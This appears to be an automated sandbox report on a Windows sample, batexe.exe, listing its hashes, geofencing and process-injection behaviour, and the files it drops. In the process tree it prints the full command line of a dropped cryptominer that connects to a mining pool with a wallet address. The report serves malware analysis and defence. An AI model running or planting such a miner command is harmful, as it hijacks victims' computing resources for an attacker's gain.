Analysis
-
max time kernel
302s -
max time network
308s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
23-02-2024 18:32
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2272 b2e.exe 5048 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 5048 cpuminer-sse2.exe 5048 cpuminer-sse2.exe 5048 cpuminer-sse2.exe 5048 cpuminer-sse2.exe 5048 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/5056-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5056 wrote to memory of 2272 5056 batexe.exe 92 PID 5056 wrote to memory of 2272 5056 batexe.exe 92 PID 5056 wrote to memory of 2272 5056 batexe.exe 92 PID 2272 wrote to memory of 1320 2272 b2e.exe 93 PID 2272 wrote to memory of 1320 2272 b2e.exe 93 PID 2272 wrote to memory of 1320 2272 b2e.exe 93 PID 1320 wrote to memory of 5048 1320 cmd.exe 96 PID 1320 wrote to memory of 5048 1320 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\48AC.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\48AC.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\48AC.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5510.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5048
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5f3100734ca3052f585cdff57de643a5a
SHA11db493fbf52a3e079bd05174346880b3730420bc
SHA256189b3abc32579ce68628d992230627ed3ac9d69d0e3507ce3acdbad2bfd8204b
SHA512a6290fe3ecd1fb6bf057c8758bd30e42a1854f86154ccc2c8735609b4d9a74156b64d41bf3cf36474a61afbf4681d23e7e11c52a37307343b8d963057bdbfc54
-
Filesize
4.4MB
MD5f1e2dcebb97a85948916d3bad725bd5f
SHA123b710369075c10de442b55459c6bc292a47ecb0
SHA2565290860743d90b1a9ed84a1af76d94907df48a000b511326d93cd1dbc16dcb89
SHA5120ae204f46a4036d31f94e307a210cedf2e7a69fb664c9aece261e5d1be66620b85d4569c11a5d9cfb058aa5f1182c19c08e12015b60bc5c8da6e76610e1d363d
-
Filesize
4.2MB
MD57a1f3a3f6d7df3bf5df85433edd697a2
SHA19909d076ccaa196182d7d53c99e43477f1b763b7
SHA2560995f434a3cfd40832746aecc23143c3111b5ea0b8629588aed9bab97fbaffce
SHA512594dccc11903e350a736f4ffbe981273eb0555d815dde47a811fc63f0e87d57bcac26cd7566f813d497011abf9ecece873b8fbe81985d0df48e748143b20befc
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.5MB
MD5fa37c8bfffe6837536d2e93f5920f1ae
SHA1af95f01a92965327acd27e5b91cb52d976ac823d
SHA2564e4830d8b31d4291811bfc91a2808a760411d7e773779064b50bedfc10086ad3
SHA512d7dfb3f53b57926c1167fd1159bdeff5de4e5709c00f308e4a0a271cb68c9d6b70099e6eb4d54b469b75f5b2970663bbf950e923e396772b6b3a5bef7a5378e3
-
Filesize
1.0MB
MD5008e5a57da89bbd1e2207b240ee0d46d
SHA1a7f09cde5a1314354ce1b0f526bf1a8ab71c2249
SHA2561e7576f71ce20258c040972cdf3797644ecfe9f7caea391844d2dcf627d86df9
SHA51220eb93c224cdcee00c0dcf5d16a1edb7b6f1ab6e9e61fb03200aa6f657efc5d402d3fb6fa1d15ae8476f4e9498777800d89ed5f23dcc13feb53247f476bc4906
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
701KB
MD5eaf470983e27a8f6ca7b8d6584a0c439
SHA1f5ab8c47caa2baf76e82148e9a46865be497baf0
SHA256158e328dd1b9cd9f9241a2c3b0d5cd271ddd5ea918b524390986c69fa2c98ec4
SHA512ffe11ff81be1e63d69f1b04e7193f6e04f7bd41cb59e5cbeead216de75d54c822d952a8729af1586ebb63f059ab595e80cdc04ed8ea9f9b42f4c21ba5a46072f
-
Filesize
1.3MB
MD504795db71068efc54e5462a1a1a9232d
SHA10180e661f8b2c2de914eb6442690b132dfb3a25c
SHA256c1a8d02673448c6b909be2e9bb3e27fb0ca4a90af2c4dac996531367331ca6b7
SHA512f76e708711934928674a2d4ca92c56304053b4b8bd3c194614785234f2775c5eedd4063494d1882730453c157e1ebceb6ec947d7ca83c03ca02e48f60a7fa59f
-
Filesize
918KB
MD56de9718022a3441900c04caf6d630e51
SHA11c4d6677986389051685ad31df7cf3859695f4ff
SHA2565e696831aff5bfeb23dba833711ce4d3d9b5ebfc1f29c64621a941fc2658f6ac
SHA5129b4d6347e969521d9ad3281212fdd2317ae5b89b097fe3f31f73f60a4fa59ff9e7d5e456958e1538203175161be206e17bb3ebf49850e1fcbefe2b4e034bb9d4
-
Filesize
809KB
MD56036064d17249aea4c6cf0e98e38853d
SHA15b23e3d639614b3fc3ef5477da094e8d7db9373f
SHA25663583f4d67789498b0a208d7ca95578cad2981283d91f6c4cf4d14006d1f9498
SHA5129bce92eeb6af740527ff046138c6a3a80e3086aa035279d59ff2360eab080ad46ec2e0b3543752935bc3aae9cf2d98f8b06018ee5a5ed3d28a8e2a087c98126a
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770